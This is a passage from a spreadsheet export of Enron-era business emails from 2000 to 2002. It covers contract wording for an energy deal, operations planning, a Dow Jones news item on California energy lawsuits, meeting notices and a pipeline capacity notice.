s=20_x000D_
(i.e. SDG&amp;E's rate cap)._x000D_
_x000D_
You can contact Susan Mara, Jeff Dasovich, or Mona Petrochko in Government=_x000D_
=20_x000D_
Affairs for better clarification if needed._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Edwin Essandoh_x000D_
10/24/2000 09:21 AM_x000D_
To: Tim Carter/HOU/EES@EES_x000D_
cc: Roger Yang/SFO/EES@EES=20_x000D_
Subject: Re: Contract for Gart Sports =20_x000D_
_x000D_
The reference to "but not including any extension pursuant to Section=20_x000D_
3(g)(ii)" should have been deleted from the contract.   It was in a previou=_x000D_
s=20_x000D_
contract which provided for an extension period, but is not applicable here=_x000D_
. =20_x000D_
_x000D_
Tim:  We could forward corrected page to customer, but I agree that it may=_x000D_
=20_x000D_
not be necessary as it does not add anything but may unnecessarily alarm=20_x000D_
Customer._x000D_
_x000D_
Roger:   Can you suggest a definition you'd be comfortable with, which=20_x000D_
references the code section  - I have not seen the code, but your point is=_x000D_
=20_x000D_
valid (although I was under the impression "residual CTC's" is understood i=_x000D_
n=20_x000D_
the industry, and the second issue (as raisesd by Tim previously) would be =_x000D_
to=20_x000D_
maek sure an amendment to AB 1890 does not extend the Pre-Rolloff Period._x000D_
_x000D_
_x000D_
My initial suggestion would be along the lines of:_x000D_
_x000D_
    =01&amp;Pre-Rolloff Period=018 shall mean, with respect to each Facility, t=_x000D_
he=20_x000D_
period of time commencing with the=20_x000D_
    Effective Date and ending on the last day the UDC for such Facility is=_x000D_
=20_x000D_
authorized to collect CTCs (other than residual CTCs=20_x000D_
    it remains authorized to collect after said date) in its service=20_x000D_
territory under AB1890 (as in effect on the Effective Date), but in      an=_x000D_
y=20_x000D_
event not later than March 2002._x000D_
_x000D_
Ed_x000D_
   =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=09Enron Energy Services_x000D_
=09_x000D_
=09From:  Tim Carter                           10/24/2000 10:15 AM_x000D_
=09Phone No: tel:  713-853-5496_x000D_
  fax:  713-646-3284_x000D_
  pgr:  888-620-2350_x000D_
=09_x000D_
_x000D_
_x000D_
_x000D_
To: Edwin Essandoh/HOU/EES@EES_x000D_
cc: =20_x000D_
Subject: Contract for Gart Sports_x000D_
_x000D_
Ed, please see comments below regarding the Gart Sports contract.  How shou=_x000D_
ld=20_x000D_
we handle?_x000D_
---------------------- Forwarded by Tim Carter/HOU/EES on 10/24/2000 10:15 =_x000D_
AM=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Roger Yang_x000D_
10/23/2000 04:19 PM_x000D_
To: Tim Carter/HOU/EES@EES_x000D_
cc: Scott Stoness/HOU/EES@EES=20_x000D_
Subject: Re: DASH for Gart Sports =20_x000D_
_x000D_
Tim,_x000D_
_x000D_
Thanks for forwarding me the contract.  In Section 3(a), there is a=20_x000D_
definition for "Post-Rolloff Period" which states, "shall mean, with respec=_x000D_
t=20_x000D_
to each Facility, the period of time commencing with the day after the last=_x000D_
=20_x000D_
day of the Pre-Rolloff Period.....but not including any extension period=20_x000D_
pursuant to Section 3(g)(ii).  The problem is that I cannot find Section=20_x000D_
3(g)(i) in the contract._x000D_
_x000D_
Further, the definition of "Pre-Rolloff Period" which states, "...ending on=_x000D_
=20_x000D_
the last day the UDC for such Facility is authorized to collect CTCs (but=_x000D_
=20_x000D_
excluding residual CTCs) in its service territory under AB1890," is=20_x000D_
ambiguous.  There are two possible solutions.  One possible solution is to=_x000D_
=20_x000D_
define the term "residual CTCs".  Another solution is to redraft the langua=_x000D_
ge=20_x000D_
to be more specific referencing the PU Codes Section 367 and 368 enacted by=_x000D_
=20_x000D_
AB1890._x000D_
_x000D_
Roger_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=09Enron Energy Services_x000D_
=09_x000D_
=09From:  Tim Carter                           10/19/2000 02:21 PM_x000D_
=09Phone No: tel:  713-853-5496_x000D_
  fax:  713-646-3284_x000D_
  pgr:  888-620-2350_x000D_
=09_x000D_
_x000D_
_x000D_
_x000D_
To: Roger Yang/SFO/EES@EES_x000D_
cc: Scott Stoness/HOU/EES@EES=20_x000D_
Subject: Re: DASH for Gart Sports =20_x000D_
_x000D_
You are correct regarding the impact to the mark if the transition period=_x000D_
=20_x000D_
ends differently than we expect._x000D_
_x000D_
The contract specifies that the transition period ends in accordance with=_x000D_
=20_x000D_
AB1890, as noted in the attatched Gart contract.  We have, however,=20_x000D_
instructed the attorney to change the contract template to also specify tha=_x000D_
t=20_x000D_
under no circumstances is the transition period to be later than 3/2002.  I=_x000D_
=20_x000D_
have not received a version of that contract._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Roger Yang_x000D_
10/19/2000 04:10 PM_x000D_
To: Tim Carter/HOU/EES@EES_x000D_
cc: Scott Stoness/HOU/EES@EES=20_x000D_
Subject: Re: DASH for Gart Sports =20_x000D_
_x000D_
I like this deal structure because it provides a hedge for our current book=_x000D_
=20_x000D_
in California.  Correct me if I am wrong, but if the end of the transition=_x000D_
=20_x000D_
period ends earlier than priced, then our mark for this deal should increas=_x000D_
e=20_x000D_
because we are providing the discount off the frozen bundled price for a=20_x000D_
shorter period than expected.  Conversely, if the rate freeze ends later th=_x000D_
an=20_x000D_
how we priced it, then the mark for this deal will decrease because we will=_x000D_
=20_x000D_
have provided a discount off of the frozen tariff for a period longer than =_x000D_
we=20_x000D_
had priced.  This impact on the mark is converse to the current risk profil=_x000D_
e=20_x000D_
of our California portfolio._x000D_
_x000D_
My main concern is the contract language on how the transition period is=20_x000D_
defined.  It is important that this language is crafted to leave no loose=_x000D_
=20_x000D_
ends.  Can you please send me a copy of the clauses that define the end of=_x000D_
=20_x000D_
the transition period, which is a critical date because the delivery risks=_x000D_
=20_x000D_
hinge on that definition.  I just want to do some preventative maintenance,=_x000D_
=20_x000D_
such that we do not enter contract dispute over this issue in the future. =_x000D_
=20_x000D_
However, we may proceed signing this contract if necessary.  I would just=_x000D_
=20_x000D_
like to follow up on the issue for future deals if it is too late for this=_x000D_
=20_x000D_
deal.  As a matter of fact, I would not even try to change the contract=20_x000D_
language on this deal because the customer may become overly concern._x000D_
_x000D_
I recommend that Scott signs the DASH for Gart Sports for now._x000D_
_x000D_
Roger_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=09Enron Energy Services_x000D_
=09_x000D_
=09From:  Tim Carter                           10/19/2000 08:16 AM_x000D_
=09Phone No: tel:  713-853-5496_x000D_
  fax:  713-646-3284_x000D_
  pgr:  888-620-2350_x000D_
=09_x000D_
_x000D_
_x000D_
_x000D_
To: Roger Yang/SFO/EES@EES_x000D_
cc: =20_x000D_
Subject: DASH for Gart Sports_x000D_
_x000D_
Roger, I think Valerie tried to fax this to you.  Here's an electronic copy=_x000D_
. =20_x000D_
Take a look, if you have any questions, please call me._x000D_
_x000D_
Thanks,_x000D_
Tim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 11:06:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'arthur.goldsmith@enron.com'})</t>
  </si>
  <si>
    <t>RE: Aggregation Deals</t>
  </si>
  <si>
    <t>Arthur,_x000D_
_x000D_
Please include Mark Denner and Chris Stokley in any future discussions.  _x000D_
_x000D_
Mark is responsible for customer invoicing and Chris is responsible for developing the consumption band calculations (Volume Management).  _x000D_
_x000D_
Please also include Brenda Herod and myself so we are up to date on activities._x000D_
_x000D_
Thanks - MO_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Goldsmith, Arthur  _x000D_
Sent:	Friday, September 28, 2001 4:19 PM_x000D_
To:	O'Neil, Murray P.; Woodward, Jason_x000D_
Cc:	Blanks, Tom; Woodward, Jason; Anzalone, Phyllis; Gonzalez, Victor; Shields, Craig_x000D_
Subject:	Aggregation Deals_x000D_
_x000D_
In recent meetings regarding the development of our aggregation book of business, there have been issues raised that will have a direct impact on Operations as we move ahead with these deals.  My concern surrounds scalability.  We appear to be introducing concepts that may not be aligned with the approach to have low-touch billing which can be completed with an automated process._x000D_
_x000D_
First, the contracts include a 110% consumption band with amounts in excess of this band being charged to the entities contributing to the excess.  Operations needs to have access to both the current and baseline monthly data in order to complete this calculation.  Further, the consumption needs to be allocated to those members contributing to the excess and a price applied for invoicing._x000D_
_x000D_
Second, the aggregators RFP's all call for EES to collect their fee and remit it back to them.  There are different methods of determining this amount, as addressed in a separate email copied to you, and this too requires Operations resources._x000D_
_x000D_
Third, pricing settlement calculations call for the comparison of weighted average hourly index charge versus the EES contract rate for the month.  This data would be available from the Baseline group, and the information exchange process needs to be clearly spelled._x000D_
_x000D_
Finally, a savings report that compares the PTB in Texas to the contract rate needs to be developed.  We have been able to get across the message that a report is better than the need to show savings on the invoice.  Again, the information exchange process and the manpower needs have to be developed._x000D_
_x000D_
Let me know who is the best contact person in your group, and we will keep you up to date on these issues._x000D_
_x000D_
Thanks,_x000D_
Arthur</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 14:03:10 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rika.imai@enron.com', 'dustin.collins@enron.com', 'garrett.tripp@enron.com', 'rogers.herndon@enron.com', 'j..broderick@enron.com', 'dana.davis@enron.com', 'm..presto@enron.com'})</t>
  </si>
  <si>
    <t>1600</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp_x000D_
_x000D_
 - 11-20 1600 Report.xls </t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 11:58:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'kate.symes@enron.com', 'paul.choi@enron.com', 'steve.walton@enron.com', 'tim.heizenrader@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'susan.rance@enron.com', 'm..driscoll@enron.com', 'legal &lt;.hall@enron.com&gt;', 'chris.mallory@enron.com', 'stewart.rosman@enron.com', 'lisa.gang@enron.com', 'robert.badeer@enron.com', 'gordon.savage@enron.com', 'dave.perrino@enron.com', 'steve.swain@enron.com', 'f..calger@enron.com', 'kit.blair@enron.com', 'chris.stokley@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'jennifer.thome@enron.com', 'jeff.richter@enron.com', 'bill.williams@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'cara.semperger@enron.com', 'phillip.platter@enron.com', 'john.malowney@enron.com', 'diana.scholtes@enron.com', 'matt.motley@enron.com', 'mark.guzman@enron.com', 'elliot.mainzer@enron.com', 'jeff.dasovich@enron.com', 'lester.rawson@enron.com', 'scotty.gilbert@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Rhetorical Excess, Says Lockyer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
January 23, 2002 _x000D_
Dow Jones Newswires_x000D_
Calif Attorney Genl Says Likely To File More Energy Suits_x000D_
Dow Jones Newswires_x000D_
_x000D_
SAN FRANCISCO (AP)--California Attorney General Bill Lockyer said Wednesday_x000D_
he is likely to file more unfair business practice lawsuits against energy_x000D_
suppliers he thinks overcharged for electricity._x000D_
_x000D_
But Lockyer, in a telephone interview, said after a yearlong investigation_x000D_
he has found no criminal wrongdoing by any energy suppliers. He said he has_x000D_
discovered possible civil violations of California consumer laws prohibiting_x000D_
overcharging - violations that carry no jail or prison time._x000D_
_x000D_
Lockyer's disclosure came a week after the state's top law enforcement_x000D_
official sued Pacific Gas and Electric Corp., the parent to Pacific Gas and_x000D_
Electric Co., for allegedly siphoning billions from its underling and_x000D_
forcing it to seek federal bankruptcy protection._x000D_
_x000D_
The PG&amp;E suit is "the first of many I would expect in the energy area to_x000D_
overcome overcharges," Lockyer told The Associated Press._x000D_
_x000D_
"We've devoted a huge amount of investigative and lawyering time to get back_x000D_
the money...generators extracted from Californians," he added._x000D_
_x000D_
Lockyer declined to name other companies that he would sue, but his office_x000D_
has subpoenaed records from Dynegy, Enron Corp., Mirant Corp. and Reliant_x000D_
Energy - all of which have denied wrongdoing. In the interview, the attorney_x000D_
general did mention Enron by name, saying "we're still looking at the energy_x000D_
overcharges," and he accused Enron of withholding documents._x000D_
_x000D_
Enron, a major energy trading concern, has filed for bankruptcy protection_x000D_
following the disclosure that it misstated its earnings by hundreds of_x000D_
millions of dollars._x000D_
_x000D_
PG&amp;E, the only supplier Lockyer has sued, blamed its woes on a 1996_x000D_
California law that left it unable to collect the full price of electricity_x000D_
from its customers._x000D_
_x000D_
Lockyer's disclosure that he hasn't discovered criminal conduct, including_x000D_
no evidence of a conspiracy to fix prices, comes nearly a year after he said_x000D_
he wanted to jail Kenneth Lay, Enron's chairman. Lockyer told the Wall_x000D_
Street Journal in May that, "I would love to personally escort Lay to an 8_x000D_
by 10 cell that he could share with a tattooed dude who says, 'Hi my name is_x000D_
Spike, honey."'_x000D_
_x000D_
On Wednesday, Lockyer declared the statement "rhetorical excess," adding,_x000D_
"So far...we haven't found criminal behavior associated with pricing_x000D_
policies."_x000D_
_x000D_
Still, the city of San Francisco has accused 13 energy suppliers of_x000D_
manipulating prices in a suit that is pending in San Diego County Superior_x000D_
Court._x000D_
_x000D_
That suit alleges the suppliers manipulated supplies to keep prices high._x000D_
San Francisco Deputy City Attorney Mark Slavin said the city doesn't have_x000D_
proof of those allegations, but would uncover them as the lawsuit proceeds_x000D_
in a process known as discovery._x000D_
_x000D_
"We think that the discovery process will uncover anticompetitive behavior,"_x000D_
Slavin said._x000D_
_x000D_
The energy suppliers have denied the allegations._x000D_
_x000D_
A California legislative committee also investigating a spike in wholesale_x000D_
energy costs has served additional subpoenas on Enron officials._x000D_
_x000D_
The Senate Select Committee to Investigate Price Manipulation in the_x000D_
Wholesale Energy Market summoned Enron officials to appear for depositions_x000D_
regarding destruction of documents. Sen. Joe Dunn, D-Santa Ana, and the_x000D_
committee's chairman, said he's concerned that documents destroyed by_x000D_
Enron's auditor, Arthur Andersen LLP, were covered by a legislative subpoena_x000D_
issued in June._x000D_
_x000D_
Dunn's committee on Wednesday also agreed to subpoena Andersen regarding the_x000D_
Enron records._x000D_
_x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
----_x000D_
URL for this Article:_x000D_
http://interactive.wsj.com/archive/retrieve.cgi?id=DI-CO-20020123-011366.djm_x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
----_x000D_
_x000D_
_x000D_
Copyright ? 2002 Dow Jones &amp; Company, Inc. All Rights Reserved. </t>
  </si>
  <si>
    <t>Tue, 11 Apr 2000 03:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.flynn@enron.com', 'carol.clair@enron.com'})</t>
  </si>
  <si>
    <t>CES/Merchant Energy Group of the Americas</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tana Jones/HOU/ECT on 04/11/2000 10:59 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Cyndie Balfour-Flanagan@ENRON_x000D_
04/11/2000 10:31 AM_x000D_
To: Stacy E Dickson/HOU/ECT@ECT, Debra Perlingiere/HOU/ECT@ECT_x000D_
cc: Gayle Horn/Corp/Enron@ENRON, Anthony Campos/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT _x000D_
Subject: CES/Merchant Energy Group of the Americas_x000D_
_x000D_
Per letter dated 12/23/99, Merchant Energy Group of the America's requested _x000D_
the termination of the CES GISBs and ISDA as it was their preference to use _x000D_
the existing ENA Ks (Master Purchase/Sale #96017205 &amp; ISDA #96019306). I have _x000D_
set the termination dates for the CES/CEM GISBs (CES GISB #96028991 &amp; CEM _x000D_
GISB #96028994) to 4/30/00 so that they will be reported in the monthly _x000D_
termination/expiration report. Please note that the CEM GISB is in your _x000D_
(Stacy/Debra) stack of non-executed contracts that we (Galye &amp; I) sent up _x000D_
last month. It can now be routed to the file room (at least that is one _x000D_
'solved' out of the stack). I've forwarded a copy of the letter to Anthony so _x000D_
he can take care of the CES ISDA (K#96029703)._x000D_
_x000D_
Cyn_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Mar 2002 06:56:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jreames@br-inc.com'})</t>
  </si>
  <si>
    <t>FW: Burlington OBA name change</t>
  </si>
  <si>
    <t xml:space="preserve">Julie,_x000D_
Contract Administration needs you to email them officially requesting a name change.  Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lokay, Michelle  _x000D_
Sent:	Tuesday, March 19, 2002 8:52 AM_x000D_
To:	Lee, Dennis_x000D_
Subject:	Burlington OBA name change_x000D_
_x000D_
 _x000D_
Burlington has agreed to execute this outstanding OBA if the name on the contract is changed.  Can we update the name from BURLINGTON RESOURCES TRADING, INC.  to BURLINGTON RESOURCES Gathering, INC.  </t>
  </si>
  <si>
    <t>Thu, 10 Feb 2000 07:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Lunch Meeting Scheduled for 2/16</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 02/10/2000 03:05 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Kimberly Perkins_x000D_
02/10/2000 03:02 PM_x000D_
To: David Oliver/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, William _x000D_
Kelly/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, William E Kasemervisz/HOU/ECT@ECT, _x000D_
Russ Severson/HOU/ECT@ECT_x000D_
cc: Scott Mills/HOU/ECT@ECT _x000D_
Subject: Lunch Meeting Scheduled for 2/16_x000D_
_x000D_
Please plan to attend the following meeting requested by Scott Mills:_x000D_
_x000D_
Topic: Business Process Changes Regarding Trade Capture _x000D_
Date: Wednesday, February 16 _x000D_
Time: 11:30 a.m. - 12:30 p.m._x000D_
Location: Conference Room 2601A_x000D_
_x000D_
Sandwiches will be served.  Please let me know if you have any special _x000D_
requests.  Thank you._x000D_
_x000D_
Kim Perkins (X3-5304)_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 May 2000 02:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jason.peters@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sheila.glover@enron.com', 'kelly.templeton@enron.com'})</t>
  </si>
  <si>
    <t>Prime Brokerage Clearance Agreement</t>
  </si>
  <si>
    <t>Sheila and Kelly,_x000D_
_x000D_
I am working with Sara Shackleton for the next few months (on loan from _x000D_
Andrews &amp; Kurth).  This morning I am sending comments to the above-referenced _x000D_
Agreement to both Chase H&amp;Q and Thomas Weisel.   Please also note that Sara _x000D_
sent comments out yesterday to Direct Trading on the Customer Agreement.  _x000D_
Should you have any questions, my extension is 3-9720._x000D_
_x000D_
Jason Peters</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wells Fargo Beta</t>
  </si>
  <si>
    <t>Tom -_x000D_
_x000D_
Pursuant to your request, attached is a draft of the Wells Fargo beta _x000D_
agreement._x000D_
_x000D_
Please let me know if you should need anything further._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark_x000D_
Senior Counsel, ENA_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3940_x000D_
E-Mail:      Mark.Greenberg@enron.com</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'carol.clair@enron.com', 'jason.peters@enron.com', 'brent.hendry@enron.com', 'robert.bruce@enron.com', 'samantha.boyd@enron.com', 'stephanie.panus@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>SWAP Group Meeting - 1st &amp; 3rd Wed of Month</t>
  </si>
  <si>
    <t>Further to rescheduling the SWAP Group meeting, listed below are the meeting _x000D_
dates remaining in 2000.  The meeting will be in EB38C1._x000D_
_x000D_
Sept. 6_x000D_
Sept. 20_x000D_
Oct. 4_x000D_
Oct. 18_x000D_
Nov. 1_x000D_
Nov. 15_x000D_
Dec. 6_x000D_
Dec. 20_x000D_
_x000D_
Once again, I apologize for any inconvenience this may have caused._x000D_
_x000D_
Best regards,_x000D_
Taffy Milligan</t>
  </si>
  <si>
    <t>Thu, 2 Mar 2000 02:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kate.agnew@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michael.guerriero@enron.com', 'joe.kishkill@enron.com'})</t>
  </si>
  <si>
    <t>Revised Reports</t>
  </si>
  <si>
    <t xml:space="preserve">Joe and Mike_x000D_
_x000D_
Thank you both for your comments on the prior draft, I have attached the _x000D_
revised reports for your review.  _x000D_
We would greatly appreciated receiving any comments by the end of the day on _x000D_
Friday, March 3._x000D_
_x000D_
Regards_x000D_
Kate Agnew_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 03:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I would like to request an additional 15 million var for gas.  Prices have _x000D_
exploded and I'm working on it.</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 08:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>IRAs</t>
  </si>
  <si>
    <t>Jay,_x000D_
_x000D_
I can't see the new IRAs on the web site.  It's no big deal.  But I would _x000D_
like to have them linked.  Thanks.  Did you go to the playoff games?  It's _x000D_
been a long time coming._x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 08:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Direct Trading Agreement</t>
  </si>
  <si>
    <t>Sara,_x000D_
David asked me how the review of Direct Trading was going?_x000D_
Thanks. Sheila</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 13:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'benjamin.rogers@enron.com', 'jinsung.myung@enron.com', 'jonathan.hoff@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Don Miller/HOU/ECT on 09/21/2000 08:43 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jeffrey Oh                           09/21/2000 07:57 PM_x000D_
	_x000D_
_x000D_
To: Andrew Kelemen/HOU/ECT@ECT, Charles Ward/Corp/Enron@ENRON, Don _x000D_
Miller/HOU/ECT@ECT, Jim Gilbert/PDX/ECT@ECT, Jody Blackburn/PDX/ECT@ECT, Ed _x000D_
Clark/PDX/ECT@ECT, jhoover@enron.com, fvicker@enron.com_x000D_
cc: Jonalan Page/PDX/ECT@ECT _x000D_
Subject: Management Presentation_x000D_
_x000D_
_x000D_
Hello everyone._x000D_
_x000D_
Here is the latest version of the management presentation. Any comments and _x000D_
feedback is encouraged and please try to get them in by Monday morning. _x000D_
_x000D_
Thanks._x000D_
_x000D_
Jeffrey Oh_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 04:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frl3@pge.com'})</t>
  </si>
  <si>
    <t>frozenset({'rnagatani@venocoinc.com', 'gworster@txuenergy.com', 'tpeterso@energy.state.ca.us', 'paulamirault@aec.ca', 'frazier@bull.som.yale.edu', 'lbdr@powercomenergy.com', 'susan.scott@enron.com', 'dwillis@sdge.com', 'napedersen@jonesday.com', 'dave.sloan@gt.pge.com', 'jmartini@cipa.org', 'steve_ponder@fpl.com', 'salleyoo@dwt.com', 'sslavigne@duke-energy.com', 'burkee@cts.com', 'mmce@dynegy.com', 'prescorw@bp.com', 'mtbrommer@tid.org', 'gnadeau@suncor.com', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'peter.saunders@paramountres.com', 'rbetonte@socalgas.com', 'mcconnk@epenergy.com', 'aamirali@caiso.com', 'steve.huhman@southernenergy.com', 'bcope@ci.redding.ca.us', 'jsuwara@sempra.com', 'john_ulrich@city.palo-alto.ca.us', 'slins@ci.glendale.ca.us', 'rochmanm@spurr.org', 'jweil@aglet.org', 'davef@abag.ca.gov', 'mike.huk@gov.ab.ca', 'gregs@mid.org', 'gac@mrwassoc.com', 'mmbr@dynegy.com', 'pete.frost@usa.conoco.com', 'bbrunel@smud.org', 'tmiller@ucmohio.com', 'pat_mulhern@oxy.com', 'gregory_hood@oxy.com', 'katie_elder@rmiinc.com', 'gjb2@pge.com', 'bobfraser@aec.ca', 'bmantz@sempra-slns.com', 'kmagruder@newpower.com', 'scohn@smud.org', 'khensman@aeraenergy.com', 'healyb@epenergy.com', 'sross@state.nm.us', 'pinney@capp.ca', 'csullivan@coral-energy.com', 'jgopal@energy.state.ca.us', 'rochmanm@cubjpa.org', 'jmpa@dynegy.com', 'bcragg@gmssr.com', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'grant_kolling@city.palo-alto.ca.us', 'jnm@cpuc.ca.gov', 'zaiontj@bp.com', 'ron_oechsler@rmiinc.com', 'rishikawa@socalgas.com', 'kmccrea@sablaw.com', 'jfossum@westernhubs.com', 'chawes@txuenergy.com', 'plg@cpuc.ca.gov', 'rmp@cpuc.ca.gov', 'tod_bradley@powerspring.com', 'eric.eisenman@neg.pge.com', 'llorenz@pacent.com', 'mdjoseph@adamsbroadwell.com', 'john.walley@swgas.com', 'randy_richards@powerspring.com', 'bradylaw@pacbell.net', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'egw@aelaw.com', 'rcampbell@wwdb.org', 'tomb@crossborderenergy.com', 'jdasovic@enron.com', 'keith.brown@swgas.com', 'mnyberg@energy.state.ca.us', 'ddame@ncpa.com', 'pkeeler@br-inc.com', 'dft1@pge.com', 'eke@aelaw.com', 'tsurak@socalgas.com', 'cprice@igservice.com', 'rdw0@pge.com', 'raveen_maan@city.palo-alto.ca.us', 'karl@ncpa.com', 'marcel@turn.org', 'epoole@adplaw.com', 'worthycg@bp.com', 'rcrowley@coral-energy.com', 'justin_sutton@powerspring.com', 'fillmotw@sce.com', 'pcervin@br-inc.com', 'michael.alexander@sce.com', 'bruce.a.connell@usa.conoco.com', 'kpurbhoo@enron.com', 'khatz@titanenergy.com', 'dmkellerton@ibm.net', 'karen@klindh.com', 'mbaldwin@igservice.com', 'craigc@calpine.com', 'ed@clfp.com', 'charles.jacobini@acnenergy.com', 'girish_balachandran@city.palo-alto.ca.us', 'rpurves@sdge.com', 'brad.king@usa.conoco.com', 'frl3@pge.com', 'cabaker@duke-energy.com', 'tlewis@titanenergy.com', 'sandra_mcdonough@pcp.ca', 'swatson@socalgas.com', 'cgoodman@energymarketers.com', 'gsullivan@sempra.com', 'jfawcet@enron.com', 'mflorio@turn.org', 'vhconsult@earthlink.net'})</t>
  </si>
  <si>
    <t>Revised "Gas Accord II" Issues List</t>
  </si>
  <si>
    <t xml:space="preserve">  CONFIDENTIAL SETTLEMENT MATERIAL_x000D_
  PER CPUC RULE 51_x000D_
_x000D_
GAS ACCORD II RULE 51 PARTIES:_x000D_
_x000D_
Attached below is the latest version of the evolving Gas Accord II Issues_x000D_
list.  Since our October 25-26 Workshop, Southern Energy has expanded on its_x000D_
issues._x000D_
_x000D_
We encourage each party to review this Issues List and provide an update_x000D_
reflecting your issues and initial positions, as appropriate.  We are_x000D_
actively using this list as we prepare for workshops and as we put together_x000D_
the first complete settlement proposal.  We request that you provide any_x000D_
revised or new input by November 15._x000D_
_x000D_
Also, please don't forget our next workshop, next week, on November 7 and 8._x000D_
_x000D_
Please return your comments and revisions to the Issues List by e-mail to_x000D_
us, and also please copy Geoff Bellenger at gjb2@pge.com_x000D_
_x000D_
Thank you for your continued participation in the Gas Accord II process._x000D_
_x000D_
_x000D_
Frank Lindh    Ray Williams_x000D_
Attorney    Director_x000D_
415-973-2776    415-973-3634_x000D_
frl3@pge.com    rdw0@pge.com_x000D_
_x000D_
 &lt;&lt;Issues List From Parties 10-30-00.doc&gt;&gt;_x000D_
_x000D_
_x000D_
 - Issues List From Parties 10-30-00.doc</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 02:57:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>REVISED - CAPACITY UPDATE EFFECTIVE FOR JUNE 2-3,  2001</t>
  </si>
  <si>
    <t>_x000D_
                      COLUMBIA GAS TRANSMISSION CORPORATION_x000D_
                        NOTICE TO ALL INTERESTED PARTIES_x000D_
                                  JUNE 01, 2001_x000D_
_x000D_
Notice ID: 2770_x000D_
5 - NO RESPONSE REQUIRED_x000D_
_x000D_
SUBJECT: REVISED - CAPACITY UPDATE EFFECTIVE FOR SATURDAY AND SUNDAY,_x000D_
         JUNE 2-3, 2001_x000D_
_x000D_
             CHANGES ARE INDICATED WITH AN *_x000D_
_x000D_
Effective Saturday and Sunday, June 2-3, 2001, capacities will be as follows:_x000D_
_x000D_
Excess MDWQ              Available +_x000D_
ISS Withdrawals          Available_x000D_
SIT Withdrawals          Available_x000D_
Imbalance Drawdowns      Available_x000D_
PAL Lends/Unparks        Available_x000D_
_x000D_
Excess MDIQ              Not Available + *_x000D_
ISS Injections           Not Available   *_x000D_
SIT Injections           Not Available   *_x000D_
Imbalance Paybacks       Not Available   *_x000D_
